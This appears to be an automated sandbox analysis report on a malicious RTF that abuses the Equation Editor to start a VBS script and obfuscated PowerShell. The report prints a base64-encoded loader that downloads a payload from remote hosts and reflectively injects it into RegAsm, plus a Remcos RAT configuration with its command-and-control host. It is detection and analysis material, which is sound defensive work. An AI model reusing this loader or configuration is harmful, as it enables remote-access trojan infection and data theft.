'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoT
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllid[1]+$SHeLlID[13]+'X')( ('Aonurl ='+' xwphttps://i'+'a60'+'01'+'00'+'.u'+'s.'+'a'+'rchive'+'.or'+'g/'+'24/items/'+'detah-note-v/'+'Deta'+'hNoteV.tx'+'txwp;A'+'onb'+'ase6'+'4Conten'+'t ='+' '+'(New'+'-O'+'bj'+'ect Sy'+'stem.Net'+'.Web'+'Cli'+'ent).D'+'ownloadString(Ao'+'nurl'+');Aonbina'+'ry'+'Content'+' '+'= ['+'S'+'ystem.C'+'onvert]'+'::'+'F'+'romB'+'as'+'e64Stri'+'ng'+'(Aonbas'+'e64Con'+'te'+'n'+'t);Aona'+'ssembly = [Re'+'flect'+'ion'+'.'+'Asse'+'mbly]::Load(A'+'on'+'b'+'inaryContent)'+';Aontype = '+'A'+'on'+'a'+'ssemb'+'l'+'y'+'.Ge'+'tT'+'yp'+'e'+'(xwpRu'+'nP'+'E.'+'Homexwp)'+';Aon'+'method'+' ='+' '+'Aon'+'type.G'+'etMethod(xwpVAI'+'xw'+'p'+');Ao'+'nmethod'+'.In'+'voke(Ao'+'n'+'null,'+' [o'+'bj'+'ect[]]@(xwp'+'txt.C'+'CO'+'NK/'+'034/08.2'+'42.5'+'7'+'1.7'+'0'+'1'+'/'+'/:ptth'+'xwp '+', xwp'+'desati'+'vad'+'oxwp'+' '+', '+'xw'+'pdesa'+'tivadoxwp '+', '+'xwpd'+'esativa'+'doxwp'+',x'+'wp'+'RegAsmx'+'w'+'p,xwpx'+'wp'+')'+')').rEpLAce(([cHAR]65+[cHAR]111+[cHAR]110),[StRING][cHAR]36).rEpLAce('xwp',[StRING][cHAR]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoT
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydw
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3316, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" , ProcessId: 3476, ProcessName: wscript.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3316, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" , ProcessId: 3476, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydw
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3316, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuddygirltodaysherewith.vBS" , ProcessId: 3476, ProcessName: wscript.exe
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3316, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydw
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3236, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3524, TargetFilename: C:\Users\user\AppData\Local\Temp\1gp2aezt.hvc.ps1

              Stealing of Sensitive Information

              barindex
              Source: Registry Key setAuthor: Joe Security: Data: Details: 77 A9 80 9E 90 2C B8 6C 51 BA A5 B2 8E A0 16 C7 79 D0 CC 92 08 78 EC 20 68 CF E2 8F A1 4B DE A4 4E 3B 44 07 84 89 BB 52 B7 F6 66 B9 84 EE 49 49 A7 72 B3 8C 9D E0 39 B5 2D C9 20 F9 BF 26 10 6C 21 F5 FC 78 E6 40 52 82 2A 39 1D 19 F1 FC 37 85 40 FD 38 55 FE 96 C3 B0 43 02 77 EB 3D 1C 38 07 1B 75 19 AC EF 04 FA 29 66 07 FE 4F 4E D5 08 7D 33 BA , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3764, TargetObject: HKEY_CURRENT_USER\Software\Rmc-R2I0JW\exepath
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T22:41:14.020787+020020204231Exploit Kit Activity Detected107.175.242.8080192.168.2.2249163TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T22:41:14.020787+020020204241Exploit Kit Activity Detected107.175.242.8080192.168.2.2249163TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T22:41:16.402303+020020365941Malware Command and Control Activity Detected192.168.2.2249164192.210.214.914645TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T22:41:17.891226+020028033043Unknown Traffic192.168.2.2249165178.237.33.5080TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: beNwFiUxpf.rtfAvira: detected
              Source: 00000009.00000002.873432773.0000000000541000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "2024remcmon.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R2I0JW", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: beNwFiUxpf.rtfReversingLabs: Detection: 47%
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3a10b60.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.873432773.0000000000541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.873432773.0000000000525000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3764, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_00433837
              Source: powershell.exe, 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_6567e9df-d

              Exploits

              barindex
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3a10b60.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3a10b60.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.378809555.00000000035A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
